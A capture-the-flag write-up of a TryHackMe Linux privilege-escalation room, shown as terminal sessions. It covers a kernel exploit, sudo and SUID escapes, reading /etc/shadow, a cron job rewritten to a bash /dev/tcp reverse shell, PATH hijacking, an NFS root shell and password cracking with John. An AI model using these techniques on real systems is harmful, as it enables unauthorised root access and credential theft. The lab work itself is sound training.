https://tryhackme.com/room/linprivesc
Enumeration
Commands that can be used to collect information about a Linux system.
Hostname
1
2
| karen@wade7363:/$ hostname
wade****
|
Linux kernel version
1
2
3
| karen@wade7363:/$ uname -a
Linux wade7363 3.**.*-**-******* #46-Ubuntu
GNU/Linux
|
1
2
3
| karen@wade7363:/$ cat /proc/version
Linux version 3.**.*-**-******* (buildd@panlong)
-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014
|
Linux distro version
1
2
3
4
5
6
7
| karen@wade7363:/$ cat /etc/os-release
NAME="Ubuntu"
VERSION="**.**, ****** ****"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu **.** LTS"
VERSION_ID="**.**"
|
Python version
1
2
| karen@wade7363:/$ python --version
Python *.*.*
|
Find a vulnerability
1
2
3
4
5
6
7
8
| $ searchsploit linux kernel 3.13.0-24 --cve --exclude="(PoC)|/dos/"
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
$ searchsploit -p 37292
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /opt/homebrew/opt/exploitdb/share/exploitdb/exploits/linux/local/37292.c
Codes: CVE-****-****
|
Kernel Exploits
This task involves using a kernel exploit to read a flag.
Use a kernel exploit
1
2
3
4
| ┌──(user㉿host1)-[~/Downloads]
└─$ sudo python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.69.129 - - [05/Jul/2023 17:44:26] "GET /37292.c HTTP/1.1" 200 -
|
1
2
3
4
5
6
7
8
9
10
| karen@wade7363:/tmp$ wget 10.2.53.143:8000/37292.c
--2023-07-05 20:44:26-- http://10.2.53.143:8000/37292.c
Connecting to 10.2.53.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-csrc]
Saving to: ‘37292.c’
100%[=========================================================================>] 5,119 --.-K/s in 0s
2023-07-05 20:44:26 (514 MB/s) - ‘37292.c’ saved [5119/5119]
|
1
2
3
4
5
6
7
8
9
10
11
| karen@wade7363:/tmp$ gcc -o ofs 37292.c
karen@wade7363:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# bash
root@wade7363:/tmp#
|
Find flag
1
2
3
4
5
| root@wade7363:/tmp# find / -name flag*txt
/home/matt/flag1.txt
root@wade7363:/tmp# cat /home/matt/flag1.txt
THM-**************
|
Sudo
Use sudo -l to check the current user’s sudo permissions. Refer to https://gtfobins.github.io/ for ways to escalate privileges when the current user has sudo rights to a particular application. This task involves abusing sudo rights of the current user to escalate privileges and read a flag.
Check sudo permissions
1
2
3
4
5
6
7
8
9
| karen@ip-10-10-9-126:/$ sudo -l
Matching Defaults entries for karen on ip-10-10-9-126:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User karen may run the following commands on ip-10-10-9-126:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano
|
Find flag
1
2
3
4
5
| karen@ip-10-10-9-126:/$ find / -name "flag2.txt" 2>/dev/null
/home/ubuntu/flag2.txt
karen@ip-10-10-9-126:/$ cat /home/ubuntu/flag2.txt
THM-*********
|
Read password hash using less
1
2
| karen@ip-10-10-9-126:/$ sudo less -F /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
|
1
2
3
4
5
6
| karen@ip-10-10-9-126:/$ sudo less /etc/profile
[within less: !/bin/sh]
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
|
Read password hash using nano
1
2
| karen@ip-10-10-9-126:/$ sudo nano /etc/shadow
[then copy paste from within nano]
|
1
2
3
4
5
6
| sudo nano
[within nano: ctrl+R then ctrl+X then: reset; sh 1>&0 2>&0]
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
|
Read password hash using find
1
2
3
4
5
| karen@ip-10-10-9-126:/$ sudo find . -exec /bin/sh \; -quit
# whoami
root
# cat /etc/shadow | grep frank
frank:$6$*********************************************************************:18796:0:99999:7:::
|
SUID
SUID (Set-user Identification) allows files to be executed with the permission level of the file owner. SGID (Set-group Identification) allows files to be executed with the permission level of the group owner. If a binary has the SUID bit set, it can potentially be used to access files inaccessible to the current user or to escalate privileges. Refer to https://gtfobins.github.io/ for ways to escalate privileges when the current user can run a binary with the SUID bit set.
This task involves abusing a binary with the SUID bit set to escalate privileges and read a flag.
Find binaries with SUID bit set
1
2
3
4
| karen@ip-10-10-37-191:/$ find / -perm -u=s -type f 2>/dev/null
...
/usr/bin/base64
...
|
Abuse SUID bit to read shadow file
1
2
3
4
| karen@ip-10-10-37-191:/$ base64 /etc/shadow | base64 --decode
...
***********:$6$****************************************************************************************************:18796:0:99999:7:::
...
|
Use unshadow to prepare to crack
1
2
3
4
5
6
7
8
| ┌──(user㉿host1)-[~/Downloads]
└─$ unshadow passwd.txt shadow.txt
...
***********:$6$****************************************************************************************************:1001:1001::/home/***********:/bin/sh
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:1002:1002::/home/user2:/bin/sh
lxd:!:998:100::/var/snap/lxd/common/lxd:/bin/false
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:1003:1003::/ho
...
|
Use John the Ripper to crack
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| ┌──(user㉿host1)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********* (karen)
********* (user2)
test123 (***********)
3g 0:00:00:13 DONE (2023-07-06 00:47) 0.2248g/s 1324p/s 1861c/s 1861C/s paramedic..ellie123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
|
Find and read flag
1
2
3
4
5
6
| karen@ip-10-10-52-126:/$ find / -name "flag3.txt" 2>/dev/null
/home/ubuntu/flag3.txt
karen@ip-10-10-52-126:/$ cat /home/ubuntu/flag3.txt
cat: /home/ubuntu/flag3.txt: Permission denied
karen@ip-10-10-52-126:/$ base64 /home/ubuntu/flag3.txt | base64 --decode
THM-*******
|
Capabilities
Capabilities provides a way for sysadmins to manage privileges more granularly. Use getcap -r / 2>/dev/null to list enabled capabilities. Refer to https://gtfobins.github.io/ for ways to escalate privileges when the current user has enabled capabilities.
Use getcap to list enabled capabilities
1
2
3
4
5
6
7
| karen@ip-10-10-184-172:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
|
Abuse cap_setuid to gain root
1
2
3
4
5
6
7
| karen@ip-10-10-184-172:~$ /home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
# bash
root@ip-10-10-184-172:~# find / -name "flag4.txt"
/home/ubuntu/flag4.txt
root@ip-10-10-184-172:~# cat /home/ubuntu/flag4.txt
THM-*******
|
Cron Jobs
Cron jobs by default run with the privilege of their owners. If a scheduled task runs with root privileges and we can change the script that will be run, that script will run with root privileges. See the system-wide cron jobs cat /etc/crontab
Find cronjob owned by root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| karen@ip-10-10-6-10:~$ cat /etc/crontab
...
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /antivirus.sh
* * * * * root antivirus.sh
* * * * * root /home/karen/backup.sh
* * * * * root /tmp/test.py
...
|
Find cronjob writable by current user
1
2
3
4
| karen@ip-10-10-6-10:~$ cat /home/karen/backup.sh
#!/bin/bash
cd /home/admin/1/2/3/Results
zip -r /home/admin/download.zip ./*
|
Modify job file with reverse shell
1
2
3
4
5
6
7
8
9
10
| karen@ip-10-10-6-10:~$ find / -name "flag5.txt" 2>/dev/null
/home/ubuntu/flag5.txt
karen@ip-10-10-6-10:~$ cat /home/ubuntu/flag5.txt
cat: /home/ubuntu/flag5.txt: Permission denied
karen@ip-10-10-6-10:~$ vi /home/karen/backup.sh
karen@ip-10-10-6-10:~$ cat /home/karen/backup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.2.53.143/6666 0>&1
karen@ip-10-10-6-10:~$ chmod 777 /home/karen/backup.sh
|
Listen for reverse shell
1
2
3
4
5
6
7
8
9
| ──(user㉿host1)-[~/Downloads]
└─$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.2.53.143] from (UNKNOWN) [10.10.6.10] 55212
bash: cannot set terminal process group (13073): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-6-10:~# cat /home/ubuntu/flag5.txt
cat /home/ubuntu/flag5.txt
THM-*********
|
Use John the ripper to crack
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| cat /etc/shadow
...
matt:$6$*****************************************************************************************:18798:0:99999:7:::
┌──(user㉿host1)-[~/Downloads]
└─$ vi matt
┌──(user㉿host1)-[~/Downloads]
└─$ cat matt
matt:$6$*****************************************************************************************:18798:0:99999:7:::
┌──(user㉿host1)-[~/Downloads]
└─$ john matt
...
Proceeding with wordlist:/usr/share/john/password.lst
****** (matt)
...
|
PATH
PATH is an environmental variable that tells the operating system where to search for executables when they are not built into the shell or defined with an absolute path.
View the PATH
1
2
| karen@ip-10-10-53-18:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
|
Find writable folders
1
2
3
4
5
6
| karen@ip-10-10-53-18:/$ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
...
home/*******
...
tmp
...
|
Find the flag
1
2
3
4
5
| karen@ip-10-10-53-18:/$ find / -name "flag6.txt" 2>/dev/null
/home/matt/flag6.txt
karen@ip-10-10-53-18:/$ cat /home/matt/flag6.txt
cat: /home/matt/flag6.txt: Permission denied
|
Explore writable folder
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| karen@ip-10-10-53-18:/tmp$ ls -l /home/*******/
total 24
-rwsr-xr-x 1 root root 16712 Jun 20 2021 test
-rw-rw-r-- 1 root root 86 Jun 20 2021 thm.py
karen@ip-10-10-53-18:/tmp$ cat /home/murdoch/thm.py
/usr/bin/python3
import os
import sys
try:
os.system("thm")
except:
sys.exit()
|
Abuse PATH to run attack
1
2
3
4
5
6
7
8
9
10
11
12
13
| karen@ip-10-10-53-18:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
export PATH=/tmp:$PATH
karen@ip-10-10-53-18:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
karen@ip-10-10-53-18:/tmp$ vi /tmp/thm
karen@ip-10-10-53-18:/tmp$ cat /tmp/thm
cat /home/matt/flag6.txt
karen@ip-10-10-53-18:/tmp$
karen@ip-10-10-53-18:/tmp$
karen@ip-10-10-53-18:/tmp$ /home/murdoch/test
THM-736628929
|
NFS
NFS configuration can be found in /etc/exports. If an NFS share is configured with “no_root_squash”, NFS will not change the root user to “nfsnobody” and will not strip files from operating with root privileges. An attacker could create an executable with SUID bit set and run it on the target system.
Check nfs config for no_root_squash
1
2
3
4
| karen@ip-10-10-39-217:/$ cat /etc/exports
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)
|
Enumerate mountable shares from attack machine
1
2
3
4
5
| root@ip-10-10-181-118:~# showmount -e 10.10.39.217
Export list for 10.10.39.217:
/home/ubuntu/sharedfolder *
/tmp *
/home/backup *
|
Mount a no_root_squash share
1
2
3
| root@ip-10-10-181-118:/tmp/backupsonattackermachine# mkdir /tmp/tmponattackermachine
root@ip-10-10-181-118:/tmp/backupsonattackermachine# mount -o rw 10.10.39.217:/tmp/ /tmp/tmponattackermachine/
root@ip-10-10-181-118:/tmp/backupsonattackermachine# cd /tmp/tmponattackermachine/
|
Compile an exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| ┌──(root㉿kali)-[~]
└─# vi nfs.c
┌──(root㉿kali)-[~]
└─# cat nfs.c
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
┌──(root㉿kali)-[~]
└─# gcc nfs.c -o nfs -w
┌──(root㉿kali)-[~]
└─# chmod +s nfs
┌──(root㉿kali)-[~]
└─# ls -l
...
-rwsr-sr-x 1 root root 16056 Jan 21 10:18 nfs
...
|
Run exploit using victim
1
2
3
4
5
6
7
8
9
10
| karen@ip-10-10-39-217:/tmp$ ./nfs
root@ip-10-10-39-217:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(karen)
root@ip-10-10-39-217:/tmp# whoami
root
root@ip-10-10-39-217:/tmp# find / -name "flag7.txt"
/home/matt/flag7.txt
root@ip-10-10-39-217:/tmp# cat /home/matt/flag7.txt
THM-********
|
Capstone Challenge
Explore target system
1
2
3
4
5
| [leonard@ip-10-10-167-52 ~]$ uname -a
Linux ip-10-10-167-52 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
[leonard@ip-10-10-167-52 ~]$ cat /proc/version
Linux version 3.10.0-1160.el7.x86_64 ([email protected]) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) ) #1 SMP Mon Oct 19 16:18:59 UTC 2020
|
Crack passwords using John the Ripper
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| [leonard@ip-10-10-167-52 ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
missy:x:1001:1001::/home/missy:/bin/bash
[leonard@ip-10-10-167-52 ~]$ base64 /etc/shadow | base64 --decode
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
──(user㉿host1)-[~/Downloads/12]
└─$ vi password
┌──(user㉿host1)-[~/Downloads/12]
└─$ cat password
root:x:0:0:root:/root:/bin/bash
missy:x:1001:1001::/home/missy:/bin/bash
┌──(user㉿host1)-[~/Downloads/12]
└─$ vi shadow
┌──(user㉿host1)-[~/Downloads/12]
└─$ cat shadow
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
┌──(user㉿host1)-[~/Downloads/12]
└─$ unshadow password shadow > unshadowed
┌──(user㉿host1)-[~/Downloads/12]
└─$ cat unshadowed
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51:0:0:root:/root:/bin/bash
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:1001:1001::/home/missy:/bin/bash
┌──(user㉿host1)-[~/Downloads/12]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********* (missy)
|
Read flag1
1
2
| [missy@ip-10-10-167-52 ~]$ cat /home/missy/Documents/flag1.txt
THM-**************
|
Check user’s privileges
1
2
3
4
5
6
7
8
9
10
11
12
| [missy@ip-10-10-167-52 ~]$ sudo -l
Matching Defaults entries for missy on ip-10-10-167-52:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME
LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User missy may run the following commands on ip-10-10-167-52:
(ALL) NOPASSWD: /usr/bin/find
|
Escalate privileges
1
2
3
| [missy@ip-10-10-167-52 ~]$ sudo find /home -exec /bin/bash \;
[root@ip-10-10-167-52 missy]# whoami
root
|
Read flag2
1
2
3
4
5
| [root@ip-10-10-167-52 missy]# ls -l /home/rootflag/
total 4
-rw-r--r--. 1 root root 20 Jun 7 2021 flag2.txt
[root@ip-10-10-167-52 missy]# cat /home/rootflag/flag2.txt
THM-***************
|